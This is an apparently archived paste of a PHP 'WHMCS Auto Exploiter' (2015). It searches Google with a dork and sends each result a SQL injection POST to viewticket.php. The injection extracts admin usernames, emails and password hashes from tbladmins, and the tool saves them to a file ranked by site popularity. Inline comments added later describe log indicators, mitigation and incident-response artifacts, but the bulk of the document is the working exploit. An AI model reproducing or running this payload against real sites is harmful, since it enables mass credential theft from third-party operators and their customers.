jackwilder

WHMCS Auto Exploit by g00n

Jun 13th, 2015
  1. <?php
  2. /*
  3. *****************************************************
  4.                 WHMCS 0day Auto Exploiter <= 5.2.8
  5.                 Coded by g00n - Skype: t3hg00n
  6.                         wwww.xploiter.net
  7. *****************************************************
  8. */
  9.  
  10. set_time_limit(0); // no execution time limit: one form submission drives the whole scan loop further down
  11. ini_set('memory_limit', '64M'); // raises the PHP memory ceiling for this request to 64 MB
  12. header('Content-Type: text/html; charset=UTF-8'); // results are streamed back as an HTML page
  13. function letItBy(){ ob_flush(); flush(); } // flushes PHP's output buffer and the web server buffer so per-target results reach the browser while the scan is still running
  14. function getAlexa($url)
  15. {
              // Looks up a traffic rank for $url from the data.alexa.com XML endpoint.
              // Returns the TEXT attribute of <POPULARITY> under the second <SD> element,
              // or 0 when that element is absent.
              // In this script the value is only written next to each dumped record
              // (see the scan loop), i.e. it labels results by site popularity.
              // $url is concatenated into the query string without urlencode().
  16.         $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  17.         $rank1 = $xml->SD[1];
  18.         if($rank1)
  19.                 $rank = $rank1->POPULARITY->attributes()->TEXT;
  20.         else
  21.                 $rank = 0;
  22.         return $rank;
  23. }
  24.        
  25. function google_that($query, $page=1)
  26. {
              // Fetches one page of web-search results for $query from the
              // ajax.googleapis.com search endpoint and returns the decoded
              // 'results' array, or false when the status is not 200 or the page is empty.
              // Terminates the whole script with die() when the response carries no
              // 'responseStatus' key (e.g. a non-JSON or blocked response).
              // Defender view: target selection is search-engine driven, so any
              // installation indexed under the queried URL pattern is reachable by this
              // tool regardless of who operates it.
  27.         $resultPerPage=8;
  28.         $start = $page*$resultPerPage; // offset of the first result for this page
  29.         $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
              // second argument true makes http_get() sleep one second before the request
  30.         $resultFromGoogle = json_decode( http_get($url, true) ,true);
  31.         if(isset($resultFromGoogle['responseStatus'])) {
  32.                 if($resultFromGoogle['responseStatus'] != '200') return false;
  33.                 if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  34.                 else return $resultFromGoogle['responseData']['results'];
  35.         }
  36.         else
  37.                 die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  38. }
  39.        
  40. function http_get($url, $safemode = false){
              // Plain cURL GET helper: returns the response body as a string
              // (curl_exec() yields false on failure).
              // $safemode === true inserts a one-second pause before the request;
              // the only caller visible here (google_that) uses it for search queries.
  41.         if($safemode === true) sleep(1);
  42.         $im = curl_init($url);
  43.         curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
  44.         curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); // give up connecting after 10 seconds
  45.         curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); // follow HTTP redirects
  46.         curl_setopt($im, CURLOPT_HEADER, 0); // response headers are not included in the result
  47.         return curl_exec($im);
  48.         curl_close();
  49. }
  50.  
  51. function check_vuln($url) {
      // Sends one POST to the viewticket.php script that sits in the same directory
      // as $url (with any "/admin" segment removed) and returns either the list of
      // ":::::"-delimited strings found in the response or the string "Fail!".
      //
      // What the request looks like on the wire (useful for log review and WAF rules):
      //  - method POST, path ending in /viewticket.php
      //  - the ticket id parameter `tid` arrives as an ARRAY with the keys
      //    `sqltype` and `value` instead of a scalar id; `value` carries a
      //    UNION SELECT that reads id, username, email and password from tbladmins
      //  - fixed User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
      //    (weak indicator on its own, useful in combination with the above)
      //  - each record in the response is wrapped in ":::::" (0x3a3a3a3a3a), which is
      //    what the regex below carves out; that marker in a response body of
      //    viewticket.php indicates the query executed
      //
      // Mitigation for an affected install: the banner of this file names WHMCS
      // versions <= 5.2.8; apply the vendor's security release, and if requests of
      // the above shape appear in access logs, treat every admin password hash in
      // tbladmins as disclosed and reset those credentials.
  52. $url = dirname($url) . '/viewticket.php';
  53. $url = str_replace("/admin","",$url);
  54.  
  55. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  56. $curl_connection = curl_init($url);
  57. if($curl_connection != false) {
  58.         curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  59.         curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  60.         curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
              // TLS certificate verification is switched off for this request
  61.         curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  62.         curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
              // supplying POSTFIELDS turns the request into a POST
  63.         curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  64.         $source = curl_exec($curl_connection);
              // $infoz[0] holds the full matches, delimiters included
  65.         preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  66.         if($infoz[0]) {
  67.                 return $infoz[0];
  68.         }
  69.         else
  70.                 return "Fail!";
  71. }
  72. else
  73.         return "Fail!";
  74. }
  75. ?>
  76. <html>
  77. <head>
  78. <title>WHMCS Auto Xploiter - by g00n</title>
  79. </head>
  80. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  81.  
  82. <STYLE>
  83. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  84. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  85. body {
  86. font-family: Tahoma
  87. }
  88. tr {
  89. BORDER: dashed 1px #333;
  90. color: #FFF;
  91. }
  92. td {
  93. BORDER: dashed 1px #333;
  94. color: #FFF;
  95. }
  96. .table1 {
  97. BORDER: 0px Black;
  98. BACKGROUND-COLOR: Black;
  99. color: #FFF;
  100. }
  101. .td1 {
  102. BORDER: 0px;
  103. BORDER-COLOR: #333333;
  104. font: 7pt Verdana;
  105. color: Green;
  106. }
  107. .tr1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. color: #FFF;
  111. }
  112. table {
  113. BORDER: dashed 1px #333;
  114. BORDER-COLOR: #333333;
  115. BACKGROUND-COLOR: Black;
  116. color: #FFF;
  117. }
  118. input {
  119. border                  : dashed 1px;
  120. border-color            : #333;
  121. BACKGROUND-COLOR: Black;
  122. font: 8pt Verdana;
  123. color: Red;
  124. }
  125. select {
  126. BORDER-RIGHT:  Black 1px solid;
  127. BORDER-TOP:    #DF0000 1px solid;
  128. BORDER-LEFT:   #DF0000 1px solid;
  129. BORDER-BOTTOM: Black 1px solid;
  130. BORDER-color: #FFF;
  131. BACKGROUND-COLOR: Black;
  132. font: 8pt Verdana;
  133. color: Red;
  134. }
  135. submit {
  136. BORDER:  buttonhighlight 2px outset;
  137. BACKGROUND-COLOR: Black;
  138. width: 30%;
  139. color: #FFF;
  140. }
  141. textarea {
  142. border                  : dashed 1px #333;
  143. BACKGROUND-COLOR: Black;
  144. font: Fixedsys bold;
  145. color: #999;
  146. }
  147. BODY {
  148.         SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  149. margin: 1px;
  150. color: Red;
  151. background-color: Black;
  152. }
  153. .main {
  154. margin                  : -287px 0px 0px -490px;
  155. BORDER: dashed 1px #333;
  156. BORDER-COLOR: #333333;
  157. }
  158. .tt {
  159. background-color: Black;
  160. }
  161.  
  162. A:link {
  163.         COLOR: White; TEXT-DECORATION: none
  164. }
  165. A:visited {
  166.         COLOR: White; TEXT-DECORATION: none
  167. }
  168. A:hover {
  169.         color: Red; TEXT-DECORATION: none
  170. }
  171. A:active {
  172.         color: Red; TEXT-DECORATION: none
  173. }
  174.  
  175. #result{margin:10px;}
  176. #result span{display:block;}
  177. #result .Y{background-color:green;}
  178. #result .X{background-color:red;}
  179. </STYLE>
  180. <script language=\'javascript\'>
  181. function hide_div(id)
  182. {
         // Hides the element with the given id and stores "<id>=0" in document.cookie.
         // NOTE(review): the \' sequences look like escapes left over from a PHP string
         // literal; nothing else on this page calls the function.
  183.   document.getElementById(id).style.display = \'none\';
  184.   document.cookie=id+\'=0;\';
  185. }
  186. function show_div(id)
  187. {
         // Shows the element with the given id (display: block) and stores "<id>=1"
         // in document.cookie. Counterpart of hide_div().
  188.   document.getElementById(id).style.display = \'block\';
  189.   document.cookie=id+\'=1;\';
  190. }
  191. function change_divst(id)
  192. {
         // Toggles visibility: an element whose inline display is 'none' is shown,
         // anything else is hidden.
  193.   if (document.getElementById(id).style.display == \'none\')
  194.     show_div(id);
  195.   else
  196.     hide_div(id);
  197. }
  198. </script>
  199. </td></table></tr>
  200. <br>
  201. <br>
  202. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  203.     <style>
  204.       body {
  205.         font-family: 'Audiowide', serif;
  206.         font-size: 30px;
  207.                
  208.       }
  209.     </style>
  210.   </head>
  211.  
  212.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  213.     <center>
  214. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  215. <br>
  216. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  217. </font>
  218. <br><br>
  219.  
  220. <table border=1 bordercolor=red>
  221. <tr>
  222. <td width="700">
  223. <br />
  224. <center>
  225.         <form method="post">
  226.                 Google Dork: &nbsp;&nbsp;
  227.                 <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  228.                 &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  229.         </form>
  230. <?php
               // Scan driver: runs only when the form posted a non-empty 'dork' value.
               // For up to 50 result pages it takes every search hit, calls check_vuln()
               // and getAlexa() on the hit's URL, and reports the outcome in the page.
               //
               // Artifacts this leaves on the machine hosting the script (relevant when
               // the file is found during incident response on a compromised web server):
               //  - "WMCS-Hashes.txt" in the script's working directory, opened in append
               //    mode; each successful target adds a block with the target URL, its
               //    traffic rank and the extracted id:username:email:password records,
               //    so the file doubles as a list of affected third parties to notify
               //  - outbound requests to the search endpoint and data.alexa.com, followed
               //    by one POST to /viewticket.php per search hit
               //
               // Search-result URLs, titles and the extracted records are echoed into the
               // HTML without escaping.
  231.         if(isset($_POST['dork']{0})) {
  232.                 $file = fopen("WMCS-Hashes.txt","a");
  233.                 echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';                      
  234.                 letItBy();                    
  235.                 for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  236.                         $googleResult = google_that($_POST['dork'], $googlePage);
                               // false means a non-200 status or an empty page: stop scanning
  237.                         if(!$googleResult) {
  238.                                 echo 'Finished scanning.';
  239.                                 fclose($file);
  240.                                 break;
  241.                         }
  242.                        
  243.                         for($victim = 0; $victim < sizeof($googleResult); $victim++){
  244.                                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  245.                                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
                                       // check_vuln() returns an array of matches on success, the string "Fail!" otherwise
  246.                                 if($result != "Fail!") {
  247.                                         $hashes = "";
  248.                                         foreach ($result as $record) {
                                                       // strip the ":::::" delimiters, one record per line
  249.                                                 $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  250.                                         }
  251.                                         $sep = "========================================================\n";
  252.                                         $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  253.                                         fwrite($file,$data);
  254.                                         echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  255.                                         echo '<span class="Y">';
  256.                                         echo "<pre>" . $data . "</pre></span><br />";
  257.                                        
  258.                                 }
  259.                                 else {
  260.                                 echo '<span class="X">';
  261.                                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  262.                                 echo "</span>\n<br />";
  263.                                 }
                                       // push this target's result to the browser before moving on
  264.                                 letItBy();
  265.                         }
  266.                 }
  267.                 echo '</div>';
  268.         }
  269. ?>
  270. </center>
  271. </td>
  272. </table>
  273. <br /><br />
  274. <font face="Audiowide" color="red" size="2">
  275. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  276. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  277. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  278. </font>
  279.  
  280. </center>
  281. </body>
  282. </html>